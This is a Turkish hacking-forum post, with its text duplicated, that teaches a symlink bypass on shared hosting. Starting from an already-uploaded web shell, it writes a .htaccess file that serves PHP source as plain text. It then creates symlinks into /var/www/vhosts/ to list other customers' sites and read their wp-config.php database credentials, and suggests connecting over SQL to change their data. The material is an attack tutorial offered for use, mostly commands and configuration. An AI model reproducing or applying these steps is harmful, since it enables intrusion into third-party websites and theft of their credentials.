H
Hacker047
Herkese merhaba şimdi sizlere server dizini
/var/www/vhosts/ bu şekilde olan siteleri nasıl bypass edeceğimi göstereceğim.(bana lazım olmuştu araştırarak öğrendim ve gerçekten çok işe yarıyor
)
Öncelikle shell yüklediğimiz dizine .htaccess diye dosya oluşturup alttaki kodları içine yapıştıralım ve kaydedelim.
2-Eğer sorunsuz bir şekilde htaccess dosyası kaydedilirse 2. aşamada komut satırına gelip
ln -s spy.txt yazıp çalıştıralım.(spy.txt yerine istediğinizi yapabilirsiniz.)
3-Şimdi de diğer siteleri görmek için shell ad kısmını silip yerine
siteadı.com/upload/spy.txt/var/www/vhosts/
diye link kısmına girelim ve siteler karşımızda olacaktır
4- Site adları aşağıdaki gibi çıkacaktır.
5- Herhangi bir siteyi seçelim ve site sistemini öğrenmeye çalışalım.
/spy.txt/var/www/vhosts/xyz.org/httpdocs/ şeklinde girmeliyiz!
Bende ki aşağıdaki gibi wordpress çıktı bu değişebilir sizde config çekerken ona göre komut vereceksiniz.
Şimdi ben buradan wp-config.php dosyasını çekmek istiyorum
bunun içinde komut çalıştıra gelip
ln -s /var/www/vhosts/xyz.org/httpdocs/wp-config.php config.php
diye komut verip çalıştıralım.Sona config.php yazmamın sebebi configin orada yazılmasını sağlamaktır.Başka bir site için çekerken farklı bir şeyler yazmamız lazım.O yüzden 1,2,3...
gibi sırayla giderseniz daha iyi olabilir.Ama çekmeden önce sitelerin çalışıp çalışmadığına bakın.
6- Ve son olarakta config bilgilerini görmek için
siteadı.com/upload/config.php diye girersek bilgiler karşımızda olacak sonrası ise sql ile bağlanıp bilgileri değiştirebilirsiniz.
video:
/var/www/vhosts/ bu şekilde olan siteleri nasıl bypass edeceğimi göstereceğim.(bana lazım olmuştu araştırarak öğrendim ve gerçekten çok işe yarıyor
)Öncelikle shell yüklediğimiz dizine .htaccess diye dosya oluşturup alttaki kodları içine yapıştıralım ve kaydedelim.
Kod:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html2-Eğer sorunsuz bir şekilde htaccess dosyası kaydedilirse 2. aşamada komut satırına gelip
ln -s spy.txt yazıp çalıştıralım.(spy.txt yerine istediğinizi yapabilirsiniz.)
3-Şimdi de diğer siteleri görmek için shell ad kısmını silip yerine
siteadı.com/upload/spy.txt/var/www/vhosts/
diye link kısmına girelim ve siteler karşımızda olacaktır
4- Site adları aşağıdaki gibi çıkacaktır.
5- Herhangi bir siteyi seçelim ve site sistemini öğrenmeye çalışalım.
/spy.txt/var/www/vhosts/xyz.org/httpdocs/ şeklinde girmeliyiz!
Bende ki aşağıdaki gibi wordpress çıktı
bu değişebilir sizde config çekerken ona göre komut vereceksiniz.Şimdi ben buradan wp-config.php dosyasını çekmek istiyorum
bunun içinde komut çalıştıra gelip
ln -s /var/www/vhosts/xyz.org/httpdocs/wp-config.php config.php
diye komut verip çalıştıralım.Sona config.php yazmamın sebebi configin orada yazılmasını sağlamaktır.Başka bir site için çekerken farklı bir şeyler yazmamız lazım.O yüzden 1,2,3...
gibi sırayla giderseniz daha iyi olabilir.Ama çekmeden önce sitelerin çalışıp çalışmadığına bakın.
6- Ve son olarakta config bilgilerini görmek için
siteadı.com/upload/config.php diye girersek bilgiler karşımızda olacak sonrası ise sql ile bağlanıp bilgileri değiştirebilirsiniz.
video:
